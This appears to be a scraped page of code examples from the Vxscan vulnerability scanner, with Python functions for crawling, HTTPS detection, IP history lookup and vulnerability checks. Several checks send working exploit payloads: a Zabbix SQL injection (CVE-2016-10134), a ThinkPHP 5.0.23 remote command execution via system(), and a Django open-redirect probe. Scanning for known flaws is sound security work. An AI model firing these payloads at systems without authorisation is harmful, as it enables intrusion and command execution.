示例#1
0
文件: crawl.py 项目: yxf010/Vxscan 
 def __init__(self, host):
     self.urls = []
     self.js = []
     self.domain = ''
     self.host = host
     self.result = []
     self.req = Requests()
示例#2
0
def verify_https(url):
    # 验证域名是http或者https的
    # 如果域名是302跳转 则获取跳转后的地址
    req = Requests()
    url2 = parse.urlparse(url)
    if url2.netloc:
        url = url2.netloc
    elif url2.path:
        url = url2.path
    # noinspection PyBroadException
    try:
        r = req.get('https://' + url)
        getattr(r, 'status_code')
        if r.status_code == 302 or r.status_code == 301:
            r = req.get('https://' + 'www.' + url)
            if r.status_code == 200:
                return 'https://' + 'www.' + url
        return 'https://' + url
    except Exception as e:
        # noinspection PyBroadException
        try:
            req.get('http://' + url)
            return 'http://' + url
        except Exception:
            pass
示例#3
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r"/jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
        try:
            r = req.get(url + payload)
            if ('ed733b8d10be225eceba344d533586' in r.text) or ('SQL error ' in r.text):
                return 'CVE-2016-10134 zabbix sqli:' + url
        except Exception as e:
            pass
示例#4
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = r'_method=__construct&filter[]=system&method=get&server[REQUEST_METHOD]=echo "{}"'.format(random_num)
        try:
            headers = {'Content-Type': 'application/x-www-form-urlencoded'}
            r = req.request(url + '/index.php?s=captcha', 'post', data=payload, headers=headers)
            if random_num in r.text:
                return 'thinkphp_5_0_23_rce | ' + url
        except Exception as e:
            pass
示例#5
0
def check(url, ip, ports, apps):
    req = Requests()
    if verify(vuln, ports, apps):
        payload = "//www.example.com"
        try:
            r = req.get(url + payload)
            if r.is_redirect and 'www.example.com' in r.headers.get(
                    'Location'):
                return 'Django < 2.0.8 任意URL跳转漏洞'
        except Exception as e:
            pass
示例#6
0
def get_info(url):
    try:
        req = Requests()
        for i in path:
            r = req.get(url + i)
            if r.status_code == 200 and '<html>' not in r.text:
                if not re.search(r'{"\w+":', r.text):
                    if verify(r.text):
                        return 'leaks : ' + url + i
    except:
        pass
示例#7
0
def ipinfo(host):
    out = []
    if not re.search(r'\d+\.\d+\.\d+\.\d+', host):
        req = Requests()
        try:
            r = req.get(
                'https://viewdns.info/iphistory/?domain={}'.format(host))
            result = re.findall(
                r'(?<=<tr><td>)\d+\.\d+\.\d+\.\d+(?=</td><td>)', r.text,
                re.S | re.I)
            if result:
                for i in result:
                    if iscdn(i):
                        out.append(i)
        except:
            pass

    return out